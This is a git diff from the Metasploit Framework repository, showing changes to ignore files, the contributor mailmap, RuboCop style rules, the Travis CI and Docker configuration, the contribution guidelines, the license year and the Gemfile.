Remove scrollout_loadlogs_exec for @bcoles

Move #6900 into unstable
Fix unstable branch
2017-04-21 21:24:06 -05:00 · 2016-07-20 15:17:32 -05:00 · 2016-07-20 15:12:45 -05:00 · 2016-07-20 13:10:17 -05:00 · 2016-05-25 19:32:55 -05:00 · 2016-05-25 04:07:09 -05:00
5683 changed files with 106093 additions and 187948 deletions
@@ -1,103 +0,0 @@
-.dockerignore
-.gitignore
-.env*
-docker-compose*.yml
-docker/
-!docker/msfconsole.rc
-!docker/entrypoint.sh
-README.md
-.git/
-.github/
-.ruby-version
-.ruby-gemset
-
-.bundle
-Gemfile.local
-Gemfile.local.lock
-# Rubymine project directory
-.idea
-# Sublime Text project directory (not created by ST by default)
-.sublime-project
-# RVM control file, keep this to avoid backdooring Metasploit
-.rvmrc
-# Allow for a local choice of (unsupported / semi-supported) ruby versions
-# See PR #4136 for usage, but example usage for rvm:
-#   rvm --create --versions-conf use 2.1.4@metasploit-framework
-# Because rbenv doesn't use .versions.conf, to achieve this same functionality, run:
-#   rbenv shell 2.1.4
-.versions.conf
-# YARD cache directory
-.yardoc
-# Mac OS X files
-.DS_Store
-# database config for testing
-config/database.yml
-# target config file for testing
-features/support/targets.yml
-# simplecov coverage data
-coverage/
-doc/
-external/source/meterpreter/java/bin
-external/source/meterpreter/java/build
-external/source/meterpreter/java/extensions
-external/source/javapayload/bin
-external/source/javapayload/build
-# Java binary ignores. Replace the 5 above with this once we're merged.
-external/source/javapayload/*/.classpath
-external/source/javapayload/*/.project
-external/source/javapayload/*/.settings
-external/source/javapayload/*/bin
-external/source/javapayload/*/target
-external/source/javapayload/*/*/.classpath
-external/source/javapayload/*/*/.project
-external/source/javapayload/*/*/.settings
-external/source/javapayload/*/*/bin
-external/source/javapayload/*/*/target
-# Packaging directory
-pkg
-tags
-*.swp
-*.orig
-*.rej
-*~
-# Ignore backups of retabbed files
-*.notab
-
-# ignore Visual Studio external source garbage
-*.suo
-*.sdf
-*.opensdf
-*.user
-
-# Rails log directory
-/log
-# Rails tmp directory
-/tmp
-
-# ignore release/debug folders for exploits
-external/source/exploits/**/Debug
-external/source/exploits/**/Release
-
-# Avoid checking in Meterpreter binaries. These are supplied upstream by
-# the metasploit-payloads gem.
-data/meterpreter/*.dll
-data/meterpreter/*.php
-data/meterpreter/*.py
-data/meterpreter/*.bin
-data/meterpreter/*.jar
-data/meterpreter/*.lso
-data/android
-data/java
-
-# Avoid checking in Meterpreter libs that are built from
-# private source. If you're interested in this functionality,
-# check out Metasploit Pro: https://metasploit.com/download
-data/meterpreter/ext_server_pivot.*.dll
-
-# Avoid checking in metakitty, the source for
-# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
-/metakitty
-.vagrant
-
-# no need for rspecs
-spec/
@@ -11,5 +11,4 @@ List the steps needed to make sure this thing works
 - [ ] ...
 - [ ] **Verify** the thing does what it should
 - [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

@@ -78,18 +78,10 @@ data/java

 # Avoid checking in Meterpreter libs that are built from
 # private source. If you're interested in this functionality,
-# check out Metasploit Pro: https://metasploit.com/download
+# check out Metasploit Pro: http://metasploit.com/download
 data/meterpreter/ext_server_pivot.*.dll

 # Avoid checking in metakitty, the source for
 # https://rapid7.github.io/metasploit-framework. It's an orphan branch.
 /metakitty
 .vagrant
-
-# local docker compose overrides
-docker-compose.local*
-.env
-
-# Ignore python bytecode
-*.pyc
-rspec.failures
@@ -1,59 +1,58 @@
-acammack-r7 <acammack-r7@github>     <acammack@aus-mbp-1099.aus.rapid7.com>
-acammack-r7 <acammack-r7@github>     <adam_cammack@rapid7.com>
-acammack-r7 <acammack-r7@github>     <Adam_Cammack@rapid7.com>
-asoto-r7 <asoto-r7@github>           <aaron_soto@rapid7.com>
-bcook-r7 <bcook-r7@github>           <bcook@rapid7.com>
+acammack-r7 <acammack-r7@github>     Adam Cammack <Adam_Cammack@rapid7.com>
 bcook-r7 <bcook-r7@github>           <busterb@gmail.com>
-bpatterson-r7 <bpatterson-r7@github> <“bpatterson@rapid7.com”>
-bpatterson-r7 <bpatterson-r7@github> <Brian_Patterson@rapid7.com>
-bturner-r7 <bturner-r7@github>       <brandon_turner@rapid7.com>
-bwatters-r7 <bwatters-r7@github>     <bwatters@rapid7.com>
-cdoughty-r7 <cdoughty-r7@github>     <chris_doughty@rapid7.com>
-dheiland-r7 <dheiland-r7@github>     <dh@layereddefense.com>
-dmaloney-r7 <dmaloney-r7@github>     <David_Maloney@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>     <DMaloney@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>     <Dev_Mohanty@rapid7.com>
-ecarey-r7 <ecarey-r7@github>         <e@ipwnstuff.com>
-egypt <egypt@github>                 <egypt@metasploit.com> # aka egypt
-egypt <egypt@github>                 <james_lee@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>     <James_Barnett@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>     <jbarnett@rapid7.com>
-jhart-r7 <jhart-r7@github>           <jon_hart@rapid7.com>
-jinq102030 <jinq102030@github>       <Jin_Qian@rapid7.com>
-jinq102030 <jinq102030@github>       <jqian@rapid7.com>
-jmartin-r7 <jmartin-r7@github>       <Jeffrey_Martin@rapid7.com>
-kgray-r7 <kgray-r7@github>           <kyle_gray@rapid7.com>
-khayes-r7 <khayes-r7@github>         <Kirk_Hayes@rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance@aus-mac-1041.aus.rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance@AUS-MAC-1041.local>
-lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez+github@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@rapid7.com>
-lsato-r7 <lsato-r7@github>           <lsato@rapid7.com>
-lvarela-r7 <lvarela-r7@github>       <“leonardo_varela@rapid7.com”>
-mkienow-r7 <mkienow-r7@github>       <matthew_kienow@rapid7.com>
-pbarry-r7 <pbarry-r7@github>         <pearce_barry@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> <paul_deardorff@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> <Paul_Deardorff@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         <scott_davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         <Scott_Davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         <sdavis@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   <sgonzalez@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   <sonny_gonzalez@rapid7.com>
-shuckins-r7 <shuckins-r7@github>     <samuel_huckins@rapid7.com>
-space-r7 <space-r7@github>           <shelby_pace@rapid7.com>
-tatanus <tatanus@github>             <adam_compton@rapid7.com>
-tdoan-r7 <tdoan-r7@github>           <thao_doan@rapid7.com>
-todb-r7 <todb-r7@github>             <tod_beardsley@rapid7.com>
-todb-r7 <todb-r7@github>             <todb@metasploit.com>
-todb-r7 <todb-r7@github>             <todb@packetfu.com>
+bcook-r7 <bcook-r7@github>           Brent Cook <bcook@rapid7.com>
+bpatterson-r7 <bpatterson-r7@github> Brian Patterson <Brian_Patterson@rapid7.com>
+bpatterson-r7 <bpatterson-r7@github> bpatterson-r7 <Brian_Patterson@rapid7.com>
+bturner-r7 <bturner-r7@github>       Brandon Turner <brandon_turner@rapid7.com>
+bwatters-r7 <bwatters-r7@github>     Brendan <bwatters@rapid7.com>
+bwatters-r7 <bwatters-r7@github>     Brendan Watters <bwatters@rapid7.com>
+cdoughty-r7 <cdoughty-r7@github>     Chris Doughty <chris_doughty@rapid7.com>
+dheiland-r7 <dheiland-r7@github>     Deral Heiland <dh@layereddefense.com>
+dmaloney-r7 <dmaloney-r7@github>     David Maloney <DMaloney@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>     David Maloney <David_Maloney@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>     dmaloney-r7 <DMaloney@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>     Dev Mohanty <Dev_Mohanty@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>     Dev Mohanty <Dev_Mohanty@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>     dmohanty-r7 <Dev_Mohanty@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>     dmohanty-r7 <Dev_Mohanty@rapid7.com>
+ecarey-r7 <ecarey-r7@github>         Erran Carey <e@ipwnstuff.com>
+farias-r7 <farias-r7@github>         Fernando Arias <fernando_arias@rapid7.com>
+gmikeska-r7 <gmikeska-r7@github>     Greg Mikeska <greg_mikeska@rapid7.com>
+gmikeska-r7 <gmikeska-r7@github>     Gregory Mikeska <greg_mikeska@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>     James Barnett <James_Barnett@rapid7.com>
+jhart-r7 <jhart-r7@github>           Jon Hart <jon_hart@rapid7.com>
+jlee-r7 <jlee-r7@github>             <egypt@metasploit.com> # aka egypt
+jlee-r7 <jlee-r7@github>             <james_lee@rapid7.com>
+kgray-r7 <kgray-r7@github>           Kyle Gray <kyle_gray@rapid7.com>
+khayes-r7 <khayes-r7@github>         l0gan <Kirk_Hayes@rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance.sanchez+github@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance.sanchez@rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance@AUS-MAC-1041.local>
+lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance@aus-mac-1041.aus.rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>     darkbushido <lance.sanchez@gmail.com>
+lsato-r7 <lsato-r7@github>           Louis Sato <lsato@rapid7.com>
+pbarry-r7 <pbarry-r7@github>         Pearce Barry <pearce_barry@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github> Paul Deardorff <Paul_Deardorff@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github> pdeardorff-r7 <paul_deardorff@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         Scott Davis <Scott_Davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         Scott Lee Davis <scott_davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         Scott Lee Davis <sdavis@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>   Sonny Gonzalez <sgonzalez@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>   Sonny Gonzalez <sonny_gonzalez@rapid7.com>
+shuckins-r7 <shuckins-r7@github>     Samuel Huckins <samuel_huckins@rapid7.com>
+tdoan-r7 <tdoan-r7@github>           tdoan-r7 <thao_doan@rapid7.com>
+tdoan-r7 <tdoan-r7@github>           thao doan <thao_doan@rapid7.com>
+todb-r7 <todb-r7@github>             Tod Beardsley <tod_beardsley@rapid7.com>
+todb-r7 <todb-r7@github>             Tod Beardsley <todb@metasploit.com>
+todb-r7 <todb-r7@github>             Tod Beardsley <todb@packetfu.com>
 wchen-r7 <wchen-r7@github>           <msfsinn3r@gmail.com> # aka sinn3r
 wchen-r7 <wchen-r7@github>           <wei_chen@rapid7.com>
-wvu-r7 <wvu-r7@github>               <William_Vu@rapid7.com>
-wvu-r7 <wvu-r7@github>               <wvu@cs.nmt.edu>
-wvu-r7 <wvu-r7@github>               <wvu@metasploit.com>
-wwalker-r7 <wwalker-r7@github>       <wyatt_walker@rapid7.com>
-wwebb-r7 <wwebb-r7@github>           <William_Webb@rapid7.com>
+wvu-r7 <wvu-r7@github>               William Vu <William_Vu@rapid7.com>
+wvu-r7 <wvu-r7@github>               William Vu <wvu@cs.nmt.edu>
+wvu-r7 <wvu-r7@github>               William Vu <wvu@metasploit.com>
+wvu-r7 <wvu-r7@github>               wvu-r7 <William_Vu@rapid7.com>
+wwebb-r7 <wwebb-r7@github>           William Webb <William_Webb@rapid7.com>
+wwebb-r7 <wwebb-r7@github>           wwebb-r7 <William_Webb@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -67,14 +66,15 @@ bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
 bcoles <bcoles@github>                 Brendan Coles <bcoles@gmail.com>
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
 brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
-brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
 brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
+brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
 brandonprry <brandonprry@github>       Brandon Perry <brandon.perry@zenimaxonline.com>
-bwall <bwall@github>                   Brian Wallace <bwall@openbwall.com>
 bwall <bwall@github>                   (B)rian (Wall)ace <nightstrike9809@gmail.com>
+bwall <bwall@github>                   Brian Wallace <bwall@openbwall.com>
 ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
+Chao-mu <Chao-Mu@github>               Chao Mu <chao.mu@minorcrash.com>
+Chao-mu <Chao-Mu@github>               chao-mu <chao.mu@minorcrash.com>
 Chao-mu <Chao-Mu@github>               chao-mu <chao@confusion.(none)>
-Chao-mu <Chao-Mu@github>               <chao.mu@minorcrash.com>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
 claudijd <claudijd@github>             Jonathan Claudius <claudijd@yahoo.com>
@@ -85,24 +85,22 @@ crcatala <crcatala@github>             Christian Catalan <ccatalan@rapid7.com>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
-espreto <espreto@github>               <robertoespreto@gmail.com>
+espreto <espreto@github>               Roberto Soares <robertoespreto@gmail.com>
+espreto <espreto@github>               Roberto Soares <robertoespreto@gmail.com>
+espreto <espreto@github>               Roberto Soares Espreto <robertoespreto@gmail.com>
+espreto <espreto@github>               Roberto Soares Espreto <robertoespreto@gmail.com>
 fab <fab@???>                          fab <> # fab at revhosts.net (Fabrice MOURRON)
-farias-r7 <farias-r7@github>           <fernando_arias@rapid7.com>
-FireFart <FireFart@github>             <firefart@gmail.com>
 FireFart <FireFart@github>             <FireFart@users.noreply.github.com>
-gmikeska-r7 <gmikeska-r7@github>       <greg_mikeska@rapid7.com>
-gmikeska-r7 <gmikeska-r7@github>       greg.mikeska@rapid7.com <=>
-gmikeska-r7 <gmikeska-r7@github>       greg.mikeska@rapid7.com <YOUR_USERNAME_FOR_EMAIL>
+FireFart <FireFart@github>             Christian Mehlmauer <firefart@gmail.com>
 g0tmi1k <g0tmi1k@github>               <g0tmi1k@users.noreply.github.com>
 g0tmi1k <g0tmi1k@github>               <have.you.g0tmi1k@gmail.com>
-h00die <h00die@github>                 <h00die@users.noreply.github.com>
-h00die <h00die@github>                 <mike@shorebreaksecurity.com>
 h0ng10 <h0ng10@github>                 h0ng10 <hansmartin.muench@googlemail.com>
 h0ng10 <h0ng10@github>                 Hans-Martin Münch <hansmartin.muench@googlemail.com>
-hdm <hdm@github>                       HD Moore <hdm@digitaloffense.net>
 hdm <hdm@github>                       HD Moore <hd_moore@rapid7.com>
+hdm <hdm@github>                       HD Moore <hdm@digitaloffense.net>
 hdm <hdm@github>                       HD Moore <x@hdm.io>
-jabra <jabra@github>                   <jabra@spl0it.org>
+jabra <jabra@github>                   Josh Abraham <jabra@spl0it.org>
+jabra <jabra@github>                   Joshua Abraham <jabra@spl0it.org>
 jcran <jcran@github>                   <jcran@0x0e.org>
 jcran <jcran@github>                   <jcran@pentestify.com>
 jcran <jcran@github>                   <jcran@pwnieexpress.com>
@@ -110,9 +108,9 @@ jcran <jcran@github>                   <jcran@rapid7.com>
 jduck <jduck@github>                   <github.jdrake@qoop.org>
 jduck <jduck@github>                   <jdrake@qoop.org>
 jgor <jgor@github>                     jgor <jgor@indiecom.org>
-joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           <Joe_Vennix@rapid7.com>
 joevennix <joevennix@github>           <joev@metasploit.com>
+joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           jvennix-r7 <Joe_Vennix@rapid7.com>
 juanvazquez <juanvazquez@github>       jvazquez-r7 <juan.vazquez@metasploit.com>
 juanvazquez <juanvazquez@github>       jvazquez-r7 <juan_vazquez@rapid7.com>
@@ -141,20 +139,15 @@ r3dy <r3dy@github>                     Royce Davis <rdavis@Royces-MacBook-Pro-2.
 r3dy <r3dy@github>                     Royce Davis <royce.e.davis@gmail.com>
 rep <mschloesser-r7@github>            Mark Schloesser <mark_schloesser@rapid7.com>
 rep <mschloesser-r7@github>            mschloesser-r7 <mark_schloesser@rapid7.com>
-RageLtMan <sempervictus@github>        <rageltman [at] sempervictus>
-RageLtMan <sempervictus@github>        <rageltman@sempervictus.com>
 Rick Flores <0xnanoquetz9l@gmail.com>  Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
 rsmudge <rsmudge@github>               Raphael Mudge <rsmudge@gmail.com> # Aka `butane
-rwhitcroft <rwhitcroft@github>         <rwhitcroft.github@gmail.com>
-rwhitcroft <rwhitcroft@github>         <rwhitcroft@gmail.com>
-rwhitcroft <rwhitcroft@github>         <rwhitcroft@users.noreply.github.com>
 schierlm <schierlm@github>             Michael Schierl <schierlm@gmx.de> # Aka mihi
 scriptjunkie <scriptjunkie@github>     Matt Weeks <scriptjunkie@scriptjunkie.us>
 scriptjunkie <scriptjunkie@github>     scriptjunkie <scriptjunkie@scriptjunkie.us>
 skape <skape@???>                      Matt Miller <mmiller@hick.org>
 spoonm <spoonm@github>                 Spoon M <spoonm@gmail.com>
-stufus <stufus@github>                 Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
 stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
+stufus <stufus@github>                 Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
 swtornio <swtornio@github>             Steve Tornio <swtornio@gmail.com>
 Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <Matthew_Buck@rapid7.com>
@@ -164,10 +157,10 @@ TomSellers <TomSellers@github>         Tom Sellers <tom@fadedcode.net>
 trevrosen <trevrosen@github>           Trevor Rosen <trevor@catapult-creative.com>
 trevrosen <trevrosen@github>           Trevor Rosen <Trevor_Rosen@rapid7.com>
 TrustedSec <davek@trustedsec.com>      trustedsec <davek@trustedsec.com>
-void-in <void-in@github>               void_in <root@localhost.localdomain>
+void-in <void-in@github>               root <void-in@users.noreply.github.com>
 void-in <void-in@github>               void-in <root@localhost.localdomain>
-void-in <void-in@github>               <void-in@users.noreply.github.com>
 void-in <void-in@github>               void-in <waqas.bsquare@gmail.com>
+void-in <void-in@github>               void_in <root@localhost.localdomain>
 void-in <void-in@github>               Waqas Ali <waqas.bsquare@gmail.com>
 zeroSteiner <zeroSteiner@github>       Spencer McIntyre <zeroSteiner@gmail.com>

@@ -8,69 +8,18 @@

 # inherit_from: .rubocop_todo.yml

-AllCops:
-  TargetRubyVersion: 2.2
-
 Metrics/ClassLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
  Enabled: true
  Exclude:
    - 'modules/**/*'

-Style/ClassAndModuleChildren:
-  Enabled: false
-  Description: 'Forced nesting is harmful for grepping and general code comprehension'
-
-Metrics/AbcSize:
-  Enabled: false
-  Description: 'This is often a red-herring'
-
-Metrics/CyclomaticComplexity:
-  Enabled: false
-  Description: 'This is often a red-herring'
-
-Metrics/PerceivedComplexity:
-  Enabled: false
-  Description: 'This is often a red-herring'
-
-Style/TernaryParentheses:
-  Enabled: false
-  Description: 'This outright produces bugs'
-
-Style/FrozenStringLiteralComment:
-  Enabled: false
-  Description: 'We cannot support this yet without a lot of things breaking'
-
-Style/RedundantReturn:
-  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
-  Enabled: false
-
-Style/NumericPredicate:
-  Description: 'This adds no efficiency nor space saving'
-  Enabled: false
-
 Style/Documentation:
  Enabled: true
  Description: 'Most Metasploit modules do not have class documentation.'
  Exclude:
    - 'modules/**/*'

-Layout/IndentHeredoc:
-  Enabled: false
-  Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
-
-Style/GuardClause:
-  Enabled: false
-  Description: 'This often introduces bugs in tested code'
-
-Style/NegatedIf:
-  Enabled: false
-  Description: 'This often introduces bugs in tested code'
-
-Style/ConditionalAssignment:
-  Enabled: false
-  Description: 'This is confusing for folks coming from other languages'
-
 Style/Encoding:
  Enabled: true
  Description: 'We prefer binary to UTF-8.'
@@ -104,10 +53,9 @@ Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

-Layout/AlignParameters:
-  Enabled: true
-  EnforcedStyle: 'with_fixed_indentation'
-  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'
+Style/SpaceInsideBrackets:
+  Enabled: false
+  Description: 'Until module template are final, most modules will fail this.'

 Style/StringLiterals:
  Enabled: false
@@ -117,10 +65,6 @@ Style/WordArray:
  Enabled: false
  Description: 'Metasploit prefers consistent use of []'

-Style/IfUnlessModifier:
-  Enabled: false
-  Description: 'This style might save a couple of lines, but often makes code less clear'
-
 Style/RedundantBegin:
  Exclude:
    # this pattern is very common and somewhat unavoidable
@@ -1 +1 @@
-2.5.1
+2.3.1
@@ -1,35 +1,24 @@
-dist: trusty
 sudo: false
 group: stable
 bundler_args: --without coverage development pcap
 cache: bundler
 addons:
-  postgresql: '9.6'
+  postgresql: '9.3'
  apt:
    packages:
      - libpcap-dev
      - graphviz
 language: ruby
 rvm:
-  - '2.3.7'
-  - '2.4.4'
-  - '2.5.1'
+  - '2.3.1'

 env:
-  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
-  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
+  - RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
+  - RAKE_TASKS=spec SPEC_OPTS="--tag content"
+  - RAKE_TASKS=spec SPEC_OPTS="--tag ~content"

 matrix:
  fast_finish: true
-
-jobs:
-  # build docker image
-  include:
-  - env: CMD="docker-compose build" DOCKER="true"
-    # we do not need any setup
-    before_install: skip
-    install: skip
-    before_script: skip
 before_install:
  - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
  - rake --version
@@ -37,19 +26,14 @@ before_install:
  - ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
  - ls -la ./.git/hooks
  - ./.git/hooks/post-merge
-  # Update the bundler
-  - gem install bundler
 before_script:
  - cp config/database.yml.travis config/database.yml
  - bundle exec rake --version
  - bundle exec rake db:create
  - bundle exec rake db:migrate
-  # fail build if db/schema.rb update is not committed
-  - git diff --exit-code db/schema.rb
 script:
-  - echo "${CMD}"
-    # we need travis_wait because the Docker build job can take longer than 10 minutes
-  - if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
+  # fail build if db/schema.rb update is not committed
+  - git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS

 notifications:
  irc: "irc.freenode.org#msfnotify"
@@ -62,6 +46,3 @@ branches:
  except:
    - gh-pages
    - metakitty
-
-services:
-  - docker
@@ -2,7 +2,7 @@
 --exclude samples/
 --exclude \.ut\.rb/
 --exclude \.ts\.rb/
--files CONTRIBUTING.md,COPYING,LICENSE
+--files CONTRIBUTING.md,COPYING,HACKING,LICENSE
 app/**/*.rb
 lib/msf/**/*.rb
 lib/metasploit/**/*.rb
@@ -36,13 +36,8 @@ and Metasploit's [Common Coding Mistakes].
 * **Do** get [Rubocop] relatively quiet against the code you are adding or modifying.
 * **Do** follow the [50/72 rule] for Git commit messages.
 * **Don't** use the default merge messages when merging from other branches.
-* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
 * **Do** create a [topic branch] to work on instead of working directly on `master`.
- If you do not send a PR from a topic branch, the history of your PR will be
- lost as soon as you update your own master branch. See
- https://github.com/rapid7/metasploit-framework/pull/8000 for an example of
- this in action.
-
+* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.

 ### Pull Requests

@@ -50,8 +45,7 @@ and Metasploit's [Common Coding Mistakes].
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
-* **Do** [reference associated issues] in your pull request description.
-* **Do** write [release notes] once a pull request is landed.
+* **Do** [reference associated issues] in your pull request description
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.

@@ -63,8 +57,8 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
  - It would be even better to set up `msftidy.rb` as a [pre-commit hook].
 * **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
 * **Don't** include more than one module per pull request.
-* **Do** include instructions on how to setup the vulnerable environment or software.
-* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs.
+* **Do** include instructions on how to setup the vulnerable environment or software
+* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs



@@ -114,7 +108,6 @@ already way ahead of the curve, so keep it up!
 [console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
 [verification steps]:https://help.github.com/articles/writing-on-github#task-lists
 [reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
-[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
 [PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
 [PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
@@ -124,4 +117,4 @@ already way ahead of the curve, so keep it up!
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
 [Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
-[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers
+[metasploit-hackers]:https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2018, Rapid7, Inc.
+Copyright (C) 2006-2016, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -1,63 +0,0 @@
-FROM ruby:2.5.1-alpine3.7
-LABEL maintainer="Rapid7"
-
-ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
-ENV APP_HOME /usr/src/metasploit-framework/
-ENV NMAP_PRIVILEGED=""
-ENV BUNDLE_IGNORE_MESSAGES="true"
-WORKDIR $APP_HOME
-
-COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME
-COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
-COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
-COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
-
-RUN apk update && \
-    apk add \
-      bash \
-      sqlite-libs \
-      nmap \
-      nmap-scripts \
-      nmap-nselibs \
-      postgresql-libs \
-      python \
-      python3 \
-      ncurses \
-      libcap \
-      su-exec \
-    && apk add --virtual .ruby-builddeps \
-      autoconf \
-      bison \
-      build-base \
-      ruby-dev \
-      libressl-dev \
-      readline-dev \
-      sqlite-dev \
-      postgresql-dev \
-      libpcap-dev \
-      libxml2-dev \
-      libxslt-dev \
-      yaml-dev \
-      zlib-dev \
-      ncurses-dev \
-      git \
-    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
-    && gem update --system \
-    && gem install bundler \
-    && bundle install --system $BUNDLER_ARGS \
-    && apk del .ruby-builddeps \
-    && rm -rf /var/cache/apk/*
-
-RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
-RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
-
-ADD ./ $APP_HOME
-
-# we need this entrypoint to dynamically create a user
-# matching the hosts UID and GID so we can mount something
-# from the users home directory. If the IDs don't match
-# it results in access denied errors. Once docker has
-# a solution for this we can revert it back to normal
-ENTRYPOINT ["docker/entrypoint.sh"]
-
-CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]
@@ -6,6 +6,8 @@ gemspec name: 'metasploit-framework'
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
  # code coverage for tests
+  # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
+  # see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
  gem 'simplecov'
 end

@@ -17,10 +19,8 @@ group :development do
  # for development and testing purposes
  gem 'pry'
  # module documentation
-  gem 'octokit'
-  # Metasploit::Aggregator external session proxy
-  # disabled during 2.5 transition until aggregator is available
-  #gem 'metasploit-aggregator'
+  gem 'octokit', '~> 4.0'
+  # rails-upgrade staging gems
 end

 group :development, :test do
@@ -33,10 +33,14 @@ group :development, :test do
  # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
  # environment is development
  gem 'rspec-rails'
